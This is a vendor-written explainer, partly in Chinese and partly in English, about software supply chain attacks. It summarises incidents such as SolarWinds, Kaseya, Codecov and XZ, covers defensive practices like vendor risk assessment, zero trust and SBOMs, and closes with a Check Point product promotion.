什麼是供應鏈攻擊？

供應鏈攻擊正在激增

Given the outsized impact they can have, it is unsurprising that supply chain attacks have dramatically increased in recent years. Data shows that from 2021 to 2023, supply chain attacks grew by 431%.

• More recent data from Check Point’s State of Cyber Security 2025 report found hardware and software supply chains experienced the highest surge of attacks in 2024.
• The report found that the average number of attacks targeting software, hardware, and semiconductor companies increased by 179%.

Experts state this is due to the increased global demand for hardware and the focus on AI technologies. As a vital component of modern infrastructure and innovations, the technological supply chain is becoming a significant target for cyber criminals.

Exploiting supply chain vulnerabilities in these sectors provides many opportunities for:

• Financial gain
• Espionage
• Disruption

High-Profile Supply Chain Incidents

隨著遠端工作和負擔的安全團隊所創造的新攻擊向量，網絡犯罪分子有很多機會進行供應鏈攻擊。 近年來最大的一些包括：

• SolarWinds： 2020 年，一個駭客組織獲得了 SolarWinds 生產環境的存取權限，並在其 Orion 網路監控產品的更新中嵌入了後門。運行惡意更新的 SolarWinds 客戶遭受數據洩露和其他安全事件。
• 卡塞屋： REvil 勒索軟體團夥利用 Kaseya（一家為託管服務提供者 (MSP) 提供軟體的軟體公司）用勒索軟體感染了 1,000 多名客戶。該集團要求 70 萬美元的贖金，以為所有受影響的客戶提供解密金鑰。

• Codecov：Codecov 是一個軟件測試組織，其 Bash 上傳程序檔（用於向公司發送代碼覆蓋報告）被攻擊者修改。 這種供應鏈漏洞使攻擊者能夠將 CodeCoV 客戶的敏感信息（如源代碼、秘密等）重定向到他們自己的伺服器。

• NotPetya： NotPetya 是一種假勒索軟體惡意軟體，它對電腦進行加密，但不保存解密金鑰。它被稱為將它變成「雨刷」。
  • NotPetya 攻擊最初是供應鏈攻擊，當時一家烏克蘭會計師事務所遭到入侵，惡意軟體包含在惡意更新中。

• Atlassian ：2020 年 11 月， Check Point Research (CPR) 發現了一系列脆弱性，這些脆弱性結合起來可用於控制透過 SSO 連結的帳戶和各種 Atlassian 應用程式。
  • 這種脆弱性成為潛在的供應鏈攻擊的原因是，一旦攻擊者利用這些缺陷並獲得帳戶的控制權，他或她就可以安裝他或她將來可以利用的後門。
  • 這可能導致嚴重傷害，只有在損壞發生後才能檢測和控制。
  • Check Point Research 負責任地向 Atlassian 團隊披露了此信息，並部署了解決方案以確保其用戶可以安全地繼續在各個平台上共享信息

• 英國航空：2018 年，英國航空遭受了 Magecart 攻擊，該攻擊了該航空公司網站上超過 380,000 筆交易。 這次攻擊是由供應鏈攻擊入侵該航空公司之一的供應商並擴散到英國航空、Ticketmaster 和其他公司。

• Linux XZ

  Discovered in 2024, the Linux XZ supply chain attack was a multi-year operation to insert a backdoor into the open-source project. XZ utilities are regularly used for compression in Linux.

  The backdoor enabled remote code execution to attackers with a specific key.

  The compromised version of XZ utilities was not widely deployed when the vulnerability was discovered. But, it was present in development versions. Experts stated that if undetected, the Linux XZ backdoor could have given the attackers access to hundreds of millions of systems around the world.

供應鏈攻擊的影響

供應鏈攻擊只是為攻擊者提供另一種破壞組織防禦的方法。 它們可用於執行任何類型的網路攻擊，例如：

• 資料外洩：供應鏈攻擊通常用於執行數據洩露。 例如，SolarWinds 黑客暴露了多個公共和私營部門組織的敏感數據。
• 惡意軟體感染：網路犯罪者經常利用供應鏈的脆弱性向目標組織傳送惡意軟體。SolarWinds 包含了惡意後門的交付，而 Kaseya 攻擊則導致了旨在利用這些後門的勒索軟體。

What Makes Supply Chain Attacks Dangerous

Supply chain attacks are a significant concern because they don’t target your systems directly, but rather exploit your trust in others. Whenever you install and use a vendor’s software or add a third-party dependency to your own code, you’re implicitly placing your trust in that vendor’s security.

This exposes you to any mistakes that might be made by external organizations and developers.

For instance, you assume they didn’t accidentally introduce vulnerabilities to their software and regularly update their code to patch out new exploits as they are discovered.

This is a particular concern for open-source dependencies…

Open-Source Software

Relying on unpaid developers to continually update their open-source projects and respond to new threats can be a major supply chain weakness.

Supply chain attacks aren’t trying to exploit the strongest link in the chain, they target the weakest. Therefore, you can be left exposed even if you develop extensive internal security controls to protect your systems without proper third-party risk management strategies.

Supply Chain Breach & Backdoor

Plus, once hackers have a supply chain breach and add a backdoor to a piece of software that is widely used, they can launch far-reaching attacks with many victims. Cybercriminals can get a much larger return on investment by compromising third-party code.

Rather than attacking an organization head-on and getting one victim, they can go after the software supply chain and get many more victims from a single vulnerability.

This attracts some of the most sophisticated hackers and groups to find supply chain attack vectors.

How to Prevent Supply Chain Attacks

While these attacks are hard to detect and remediate, there are best practices for supply chain cybersecurity that you can implement to limit their impact. These processes can be broken down into third-party risk management approaches that improve your supply chain resilience, and internal practices that limit the impact of compromised systems.

Third-Party Risk Management

Assessing vendor security standards and managing the risk of using external software and dependencies is a critical aspect of supply chain cybersecurity. You need to rigorously assess your vendors and determine the security of their development practices.

Performing third-party risk assessments allows you to identify specific security policies you want vendors to implement to work with you.

Plus, you can group vendors based on the risk they pose (their internal security practices and how much access they have to your sensitive business data). Then, prioritize monitoring each vendor based on their vulnerability level. This includes:

• Identifying all open source dependencies
• Ensuring they remain active projects that still push updates based on the latest threats.

Beyond open source projects, patch management is a vital aspect across supply chain cybersecurity.

You have to maintain the latest software versions to ensure the window of risk posed by new vulnerabilities is as small as possible.

Minimizing the Impact of a Supply Chain Breach

To minimize third-party supply chain risks, you need to reduce the access these systems have within your network. This includes introducing zero trust practices based on least privilege access. This makes applications and users continually verify their identity while only providing access to the systems they need, nothing more.

Another Zero Trust Network Access (ZTNA) technique is network segmentation, which divides your systems into siloed sections with strong security controls when moving between them.

ZTNA reduces the impact of supply chain breaches by preventing lateral movement.

The attacker only has access to the initial compromised system and struggles to extend their access further. Other techniques to help prevent supply chain attacks include:

• Following DevSecOps best practices to test for vulnerabilities in any dependencies you use. You can improve software development visibility through a Software Bill of Materials (SBOM) that tracks details (source, version, etc.) of every dependency.
• Regularly scanning your system with malware prevention tools to prevent attacks from executing.
• Develop incident response plans that include considerations for supply chain attacks. This could implement sandboxing new code before executing it to mitigate any backdoors.
• Track all of the applications and services employees use and uncover any shadow IT (unsanctioned applications) to ensure your supply chain attack surface is not larger than you realise.

使用 Check Point 防範供應鏈攻擊

供應鏈攻擊者可利用組織環境中缺乏監控。 Check Point Harmony 端點透過監控應用程式是否有可能導致洩漏的可疑行為，幫助組織防範這些威脅。

要了解有關 Harmony 端點防禦的攻擊類型的更多信息，請查看Check Point 的 2021 年網路安全報告。然後，進行安全檢查以了解您環境中的安全性問題。 您還可以透過免費演示了解如何彌補這些安全缺口。